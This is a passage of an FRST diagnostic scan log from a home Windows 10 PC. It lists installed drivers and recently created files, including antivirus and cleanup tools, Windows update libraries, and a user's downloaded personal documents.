R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [935168 2016-01-19] (Realtek )
S3 RTSPER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [769752 2016-01-20] (Realsil Semiconductor Corporation)
S3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [413912 2016-01-20] (Realsil Semiconductor Corporation)
S3 SmbDrv; C:\WINDOWS\System32\drivers\Smb_driver_AMDASF.sys [58984 2016-02-22] (Synaptics Incorporated)
R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [72824 2016-08-19] (Synaptics Incorporated)
R0 trufos; C:\WINDOWS\System32\DRIVERS\trufos.sys [520032 2016-06-22] (BitDefender S.R.L.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
R3 WirelessButtonDriver64; C:\WINDOWS\system32\DRIVERS\WirelessButtonDriver64.sys [31656 2016-04-14] (HP)
U0 aswVmm; no ImagePath
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2017-02-01 21:13 - 2017-02-01 21:16 - 00002795 _____ C:\Users\Joseph\Downloads\Fixlog.txt
2017-02-01 21:11 - 2017-02-01 21:13 - 00000000 ____D C:\Users\Joseph\Documents\FRST911
2017-02-01 20:30 - 2017-02-01 21:28 - 00000000 ____D C:\Users\Joseph\AppData\LocalLow\Mozilla
2017-02-01 20:29 - 2017-02-01 20:36 - 00000000 ____D C:\Users\Joseph\AppData\Local\Mozilla
2017-02-01 20:29 - 2017-02-01 20:30 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Mozilla
2017-02-01 20:28 - 2017-02-01 20:28 - 00001239 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-02-01 20:28 - 2017-02-01 20:28 - 00001227 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-02-01 20:28 - 2017-02-01 20:28 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-02-01 20:28 - 2017-02-01 20:28 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-02-01 20:26 - 2017-02-01 20:27 - 00245424 _____ C:\Users\Joseph\Downloads\Firefox Setup Stub 51.0.1.exe
2017-02-01 18:24 - 2017-02-01 18:25 - 55566792 _____ (Malwarebytes ) C:\Users\Joseph\Downloads\mb3-setup-cb.NT-3.0.6.1469.exe
2017-02-01 17:47 - 2017-02-01 21:09 - 00041949 _____ C:\Users\Joseph\Downloads\Addition.txt
2017-02-01 17:45 - 2017-02-01 21:30 - 00024848 _____ C:\Users\Joseph\Downloads\FRST.txt
2017-02-01 17:45 - 2017-02-01 21:30 - 00000000 ____D C:\FRST
2017-02-01 17:43 - 2017-02-01 17:45 - 02420736 _____ (Farbar) C:\Users\Joseph\Downloads\FRST64.exe
2017-02-01 17:20 - 2017-02-01 17:27 - 00000556 _____ C:\Users\Joseph\Desktop\JRT.txt
2017-02-01 17:07 - 2017-02-01 21:17 - 00002361 _____ C:\bdlog.txt
2017-02-01 17:02 - 2017-02-01 18:10 - 00000000 ____D C:\AdwCleaner
2017-02-01 16:58 - 2017-02-01 17:15 - 01663040 _____ (Malwarebytes) C:\Users\Joseph\Downloads\JRT (1).exe
2017-02-01 16:56 - 2017-02-01 16:58 - 01663040 _____ (Malwarebytes) C:\Users\Joseph\Downloads\JRT.exe
2017-02-01 16:54 - 2017-02-01 17:01 - 03988944 _____ C:\Users\Joseph\Downloads\AdwCleaner.exe
2017-02-01 16:52 - 2017-02-01 16:52 - 00040137 _____ C:\ProgramData\dm.1485985887.bdinstall.bin
2017-02-01 09:33 - 2017-02-01 09:33 - 00000385 _____ C:\WINDOWS\system32\user_gensett.xml
2017-02-01 08:54 - 2017-02-01 08:54 - 00000000 ____D C:\Users\Joseph\AppData\Temp
2017-02-01 08:52 - 2017-02-01 08:52 - 00056949 _____ C:\ProgramData\dm.1485956857.bdinstall.bin
2017-02-01 08:51 - 2017-02-01 08:51 - 00000000 ____D C:\ProgramData\Bitdefender Device Management
2017-02-01 08:47 - 2017-02-01 18:34 - 00003406 _____ C:\WINDOWS\System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C
2017-02-01 08:47 - 2017-02-01 08:47 - 00403991 _____ C:\ProgramData\cl.1485956260.bdinstall.bin
2017-02-01 08:45 - 2017-02-01 08:45 - 00002310 _____ C:\Users\Public\Desktop\Bitdefender 2017.lnk
2017-02-01 08:45 - 2017-02-01 08:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitdefender 2017
2017-02-01 08:45 - 2017-02-01 08:45 - 00000000 ____D C:\ProgramData\BDLogging
2017-02-01 08:44 - 2016-09-20 04:17 - 01605376 _____ (BitDefender) C:\WINDOWS\system32\Drivers\avc3.sys
2017-02-01 08:44 - 2016-09-20 04:16 - 00878072 _____ (BitDefender) C:\WINDOWS\system32\Drivers\avckf.sys
2017-02-01 08:44 - 2016-03-14 22:04 - 00023672 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\bdelam.sys
2017-02-01 08:44 - 2015-12-04 19:27 - 00087912 _____ (BitDefender) C:\WINDOWS\system32\Drivers\bdvedisk.sys
2017-02-01 08:44 - 2007-04-11 11:11 - 00511328 _____ (Microsoft Corporation) C:\WINDOWS\capicom.dll
2017-02-01 08:43 - 2017-02-01 08:51 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Bitdefender
2017-02-01 08:43 - 2016-11-17 05:00 - 00309280 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\ignis.sys
2017-02-01 08:38 - 2017-02-01 18:34 - 00000000 ____D C:\ProgramData\Bitdefender
2017-02-01 08:38 - 2017-02-01 08:47 - 00000000 ____D C:\Program Files\Bitdefender
2017-02-01 08:38 - 2016-10-29 08:54 - 00182944 _____ (BitDefender LLC) C:\WINDOWS\system32\Drivers\gzflt.sys
2017-02-01 08:38 - 2016-06-22 14:40 - 00520032 _____ (BitDefender S.R.L.) C:\WINDOWS\system32\Drivers\trufos.sys
2017-02-01 08:37 - 2017-02-01 08:38 - 00000000 ____D C:\Program Files\Common Files\Bitdefender
2017-02-01 08:37 - 2017-02-01 08:37 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\QuickScan
2017-02-01 08:29 - 2017-02-01 08:29 - 00003794 _____ C:\WINDOWS\System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864
2017-02-01 08:27 - 2017-02-01 21:29 - 00000000 ____D C:\Program Files\Bitdefender Agent
2017-02-01 08:27 - 2017-02-01 08:27 - 00047353 _____ C:\ProgramData\agent.1485955633.bdinstall.bin
2017-02-01 08:27 - 2017-02-01 08:27 - 00000000 ____D C:\ProgramData\Bitdefender Agent
2017-02-01 08:26 - 2017-02-01 08:27 - 11842648 _____ C:\Users\Joseph\Downloads\bitdefender_windows_43ea11d5-575e-4d5e-84a9-5683192df898.exe
2017-01-31 23:27 - 2017-01-31 23:27 - 00000017 _____ C:\Users\Joseph\AppData\Local\resmon.resmoncfg
2017-01-31 23:13 - 2017-01-31 23:13 - 00251848 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\132034FB.sys
2017-01-31 15:37 - 2017-01-31 15:37 - 01923396 _____ C:\Users\Joseph\Downloads\hospital visit.pdf
2017-01-30 20:58 - 2017-01-30 20:59 - 02059056 _____ (The Nielsen Company) C:\Users\Joseph\Downloads\ShopTracker_033D6D4A68A315B4A000 (2).exe
2017-01-28 01:57 - 2017-01-28 01:57 - 00000000 ____D C:\WINDOWS\System32\Tasks\AVAST Software
2017-01-28 01:57 - 2017-01-28 01:57 - 00000000 ____D C:\Program Files\Common Files\AV
2017-01-25 00:02 - 2016-12-21 02:08 - 00142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
2017-01-25 00:02 - 2016-12-20 23:44 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
2017-01-24 23:47 - 2017-01-21 21:14 - 00485032 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2017-01-24 17:47 - 2017-01-24 17:47 - 10697014 _____ C:\Users\Joseph\Downloads\FDN_Glyphosate_FoodTesting_Report_p2016.pdf
2017-01-24 13:33 - 2017-01-24 13:33 - 00083650 _____ C:\Users\Joseph\Downloads\visit 1-23.pdf
2017-01-21 13:55 - 2017-02-01 08:34 - 00000000 ____D C:\ProgramData\AVAST Software
2017-01-21 13:55 - 2017-01-21 13:55 - 06253640 _____ (AVAST Software) C:\Users\Joseph\Downloads\avast_free_antivirus_setup_online_cnet_2.exe
2017-01-19 21:09 - 2017-01-19 21:09 - 00151143 _____ C:\Users\Joseph\Downloads\PDF_Bill (2).pdf
2017-01-19 21:09 - 2017-01-19 21:09 - 00150985 _____ C:\Users\Joseph\Downloads\PDF_Bill (3).pdf
2017-01-19 21:08 - 2017-01-19 21:08 - 00199440 _____ C:\Users\Joseph\Downloads\PDF_Bill (1).pdf
2017-01-19 21:06 - 2017-01-19 21:06 - 00001115 _____ C:\Users\Joseph\Downloads\AccountEnergyUsage.csv
2017-01-19 20:26 - 2017-01-19 20:26 - 00223944 _____ C:\Users\Joseph\Downloads\djcxMjYtODA5MC04MDkxLTgzNjMtT0lCMS00MDRGQUFCQi0wLTIyMzk0NC00Nzk2ODE3LTIyMzk0NC04NS02OC0wLTE2OS0wLV4BUAExNzA5NgEyMzYxNAE0AUNCQwFDQkMwMQEyMDA0LTAwMDEBQUNDRVNTIE5BVElPTkFMIENPUlBPUkFUSU9OIFBST0ZJVCBTSEFSSU5HIFBMQU4BTkEBUk.pdf
2017-01-19 14:36 - 2017-01-19 14:36 - 00000000 ____D C:\Users\Joseph\AppData\LocalLow\Temp
2017-01-18 22:07 - 2017-01-18 22:07 - 00676419 _____ C:\Users\Joseph\Downloads\137230-201711873115438.pdf
2017-01-15 18:00 - 2017-01-15 18:00 - 00151143 _____ C:\Users\Joseph\Downloads\PDF_Bill.pdf
2017-01-15 16:33 - 2017-01-15 16:33 - 00086004 _____ C:\Users\Joseph\Downloads\DS82_Complete (1).pdf
2017-01-15 16:15 - 2017-01-15 16:15 - 00683112 _____ C:\Users\Joseph\Downloads\taxReturn (1).tax2016
2017-01-15 16:11 - 2017-01-15 16:24 - 01487502 _____ C:\Users\Joseph\Downloads\taxReturn.tax2016
2017-01-15 15:50 - 2017-01-15 15:50 - 06281998 _____ C:\Users\Joseph\Downloads\C2 Artist Mini-Posters.pdf
2017-01-15 15:44 - 2017-01-15 15:44 - 00002529 _____ C:\Users\Public\Desktop\TurboTax 2016.lnk
2017-01-15 15:44 - 2017-01-15 15:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TurboTax 2016
2017-01-15 15:29 - 2017-01-15 15:30 - 121060464 _____ C:\Users\Joseph\Downloads\turbotax_deluxe_2016_windows.exe
2017-01-14 21:56 - 2017-01-14 21:56 - 00085948 _____ C:\Users\Joseph\Downloads\DS82_Complete.pdf
2017-01-14 11:22 - 2017-01-14 11:22 - 00235450 _____ C:\Users\Joseph\Downloads\CAMP_CONNECTION_CARNIVAL_flier2106.pdf
2017-01-13 15:55 - 2017-01-13 15:53 - 72520712 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCoRes64.dat
2017-01-13 15:55 - 2017-01-13 15:53 - 07704619 _____ C:\WINDOWS\system32\Drivers\RTAIODAT.DAT
2017-01-13 15:55 - 2017-01-13 15:53 - 03204096 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtPgEx64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 03014144 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTSnMg64.cpl
2017-01-13 15:55 - 2017-01-13 15:53 - 02706856 _____ (DTS, Inc.) C:\WINDOWS\system32\sltech64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 02201088 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCoInstII64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 01615656 _____ (Conexant Systems Inc.) C:\WINDOWS\system32\CX64APO.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 01529136 _____ (Conexant Systems Inc.) C:\WINDOWS\system32\CX64Proxy.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 01435136 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRRPTR64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 01360512 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTCOM64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 01003320 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEHDHF64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00984912 _____ (DTS, Inc.) C:\WINDOWS\system32\sl3apo64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00865912 _____ (Sound Research, Corp.) C:\WINDOWS\SysWOW64\SEHDHF32.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00859216 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEHDRA64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00850400 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SECOMN64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00721800 _____ (Sound Research, Corp.) C:\WINDOWS\SysWOW64\SECOMN32.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00689872 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtDataProc64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00574752 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AERTAC64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00532376 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSTSX64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00499152 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEAPO64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00467152 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRAPO64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00438688 _____ (Conexant Systems, Inc.) C:\WINDOWS\system32\CAF64APO2.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00387312 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEP64A.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00381400 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00343704 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtlCPAPI64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00341144 _____ (Synopsys, Inc.) C:\WINDOWS\SysWOW64\SRCOM.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00341144 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00321712 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DHT64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00321712 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DAA64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00258864 _____ (TODO: <Company name>) C:\WINDOWS\system32\slprp64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00214832 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEED64A.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00166200 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSWOW64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00122320 _____ (Real Sound Lab SIA) C:\WINDOWS\system32\CONEQMSAPOGUILibrary.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00118592 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AERTAR64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00112488 _____ (Conexant Systems, Inc.) C:\WINDOWS\system32\Caf64api.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00110984 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEL64A.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00088344 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEG64A.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00005604 _____ C:\WINDOWS\system32\cxapo.lncs
2017-01-13 15:55 - 2017-01-13 15:53 - 00000736 _____ C:\WINDOWS\system32\cxapo.prop
2017-01-11 23:08 - 2017-01-11 23:08 - 02604526 _____ C:\Users\Joseph\Downloads\AAS-L2-Student-Packet-Sample.pdf
2017-01-11 22:56 - 2017-01-11 22:56 - 02399782 _____ C:\Users\Joseph\Downloads\AAS-L1-Student-Packet-Sample.pdf
2017-01-11 22:55 - 2017-01-11 22:55 - 05323693 _____ C:\Users\Joseph\Downloads\AAR-L1-2ndEd-CobwebtheCat-Sample.pdf
2017-01-11 15:10 - 2017-01-11 15:10 - 05432492 _____ C:\Users\Joseph\Downloads\01-08-2017.pdf
2017-01-11 15:07 - 2017-01-11 15:07 - 00106459 _____ C:\Users\Joseph\Downloads\bill_10912246.pdf
2017-01-10 22:58 - 2016-12-21 00:09 - 00263472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll
2017-01-10 22:58 - 2016-12-21 00:01 - 20969928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-01-10 22:58 - 2016-12-20 23:46 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
2017-01-10 22:58 - 2016-12-20 23:43 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BlockedShutdown.dll
2017-01-10 22:58 - 2016-12-20 23:41 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BioFeedback.dll
2017-01-10 22:58 - 2016-12-20 23:40 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2017-01-10 22:58 - 2016-12-20 23:40 - 00318976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpencom.dll
2017-01-10 22:58 - 2016-12-20 23:40 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncSettings.dll
2017-01-10 22:58 - 2016-12-20 23:40 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-01-10 22:58 - 2016-12-20 23:39 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-01-10 22:58 - 2016-12-20 23:38 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Cred.dll
2017-01-10 22:58 - 2016-12-20 23:34 - 07626752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-01-10 22:58 - 2016-12-20 23:30 - 05398016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aclui.dll
2017-01-10 22:58 - 2016-12-20 23:30 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-01-10 22:58 - 2016-12-20 23:25 - 07469056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2017-01-10 22:58 - 2016-12-20 23:22 - 01883648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2017-01-10 22:58 - 2016-12-20 23:22 - 00860672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2017-01-10 22:58 - 2016-12-14 00:08 - 00341344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2017-01-10 22:58 - 2016-12-14 00:06 - 00509792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2017-01-10 22:58 - 2016-12-14 00:01 - 01557808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2017-01-10 22:58 - 2016-12-13 23:45 - 00147968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
2017-01-10 22:58 - 2016-12-13 23:42 - 00167424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinSCard.dll
2017-01-10 22:58 - 2016-12-13 23:36 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2017-01-10 22:58 - 2016-12-13 23:35 - 00712192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2017-01-10 22:58 - 2016-12-13 23:35 - 00553984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptui.dll
2017-01-10 22:58 - 2016-12-13 23:22 - 02998272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-01-10 22:58 - 2016-12-13 23:22 - 02748416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpcore.dll
2017-01-10 22:57 - 2016-12-21 00:59 - 00218976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offlinesam.dll
2017-01-10 22:57 - 2016-12-21 00:02 - 03892864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2017-01-10 22:57 - 2016-12-21 00:02 - 01852720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2017-01-10 22:57 - 2016-12-21 00:02 - 01360464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
2017-01-10 22:57 - 2016-12-21 00:02 - 01277344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
2017-01-10 22:57 - 2016-12-21 00:02 - 01201872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2017-01-10 22:57 - 2016-12-21 00:02 - 00980832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
2017-01-10 22:57 - 2016-12-20 23:41 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
2017-01-10 22:57 - 2016-12-20 23:39 - 01300480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2017-01-10 22:57 - 2016-12-20 23:35 - 04612608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2017-01-10 22:57 - 2016-12-20 23:35 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\indexeddbserver.dll
2017-01-10 22:57 - 2016-12-20 23:33 - 19413504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-01-10 22:57 - 2016-12-20 23:32 - 19417600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-01-10 22:57 - 2016-12-20 23:27 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
2017-01-10 22:57 - 2016-12-20 23:26 - 01155072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVP9DEC.dll
2017-01-10 22:57 - 2016-12-20 23:25 - 06474752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe
2017-01-10 22:57 - 2016-12-20 23:24 - 06044160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-01-10 22:57 - 2016-12-20 23:24 - 05061120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-01-10 22:57 - 2016-12-20 23:24 - 03733504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-01-10 22:57 - 2016-12-20 23:24 - 00886272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-01-10 22:57 - 2016-12-14 00:21 - 02206496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msmpeg2vdec.dll
2017-01-10 22:57 - 2016-12-14 00:01 - 00382784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AUDIOKSE.dll
2017-01-10 22:57 - 2016-12-14 00:01 - 00076984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\remoteaudioendpoint.dll
2017-01-10 22:57 - 2016-12-13 23:46 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2017-01-10 22:57 - 2016-12-13 23:40 - 00231424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
2017-01-10 22:57 - 2016-12-13 23:40 - 00104448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.UI.Logon.ProxyStub.dll
2017-01-10 22:57 - 2016-12-13 23:38 - 13869056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2017-01-10 22:57 - 2016-12-13 23:38 - 00213504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.CredDialogController.dll
2017-01-10 22:57 - 2016-12-13 23:35 - 00755712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2017-01-10 22:57 - 2016-12-13 23:32 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3D12.dll
2017-01-10 22:57 - 2016-12-13 23:32 - 00497152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LogonController.dll
2017-01-10 22:57 - 2016-11-02 07:01 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2017-01-10 22:57 - 2016-08-01 23:30 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2017-01-10 22:48 - 2016-12-21 02:49 - 00328008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
2017-01-10 22:47 - 2016-12-21 03:08 - 00136032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ImplatSetup.dll
2017-01-10 22:47 - 2016-12-21 03:04 - 07816032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-01-10 22:47 - 2016-12-21 02:43 - 04130440 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2017-01-10 22:47 - 2016-12-21 02:43 - 01454504 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetsrc.dll
2017-01-10 22:47 - 2016-12-21 02:43 - 01071736 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll
2017-01-10 22:47 - 2016-12-21 02:43 - 00092512 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2017-01-10 22:47 - 2016-12-21 02:42 - 22224480 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-01-10 22:47 - 2016-12-21 02:42 - 01988560 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2017-01-10 22:47 - 2016-12-21 02:42 - 01702392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfasfsrcsnk.dll
2017-01-10 22:47 - 2016-12-21 02:42 - 01300600 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2017-01-10 22:47 - 2016-12-21 02:41 - 01600632 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2017-01-10 22:47 - 2016-12-21 02:14 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2017-01-10 22:47 - 2016-12-21 02:13 - 00119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCsp.dll
2017-01-10 22:47 - 2016-12-21 02:12 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProvPluginEng.dll
2017-01-10 22:47 - 2016-12-21 02:10 - 00234496 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCore.dll
2017-01-10 22:47 - 2016-12-21 02:09 - 00368640 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneBackupHandler.dll
2017-01-10 22:47 - 2016-12-21 02:09 - 00363520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BioFeedback.dll
2017-01-10 22:47 - 2016-12-21 02:08 - 01292288 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2017-01-10 22:47 - 2016-12-21 02:08 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BlockedShutdown.dll
2017-01-10 22:47 - 2016-12-21 02:08 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpencom.dll
2017-01-10 22:47 - 2016-12-21 02:08 - 00349184 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2017-01-10 22:47 - 2016-12-21 02:08 - 00289792 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeveloperOptionsSettingsHandlers.dll
2017-01-10 22:47 - 2016-12-21 02:08 - 00211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-01-10 22:47 - 2016-12-21 02:07 - 00748544 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
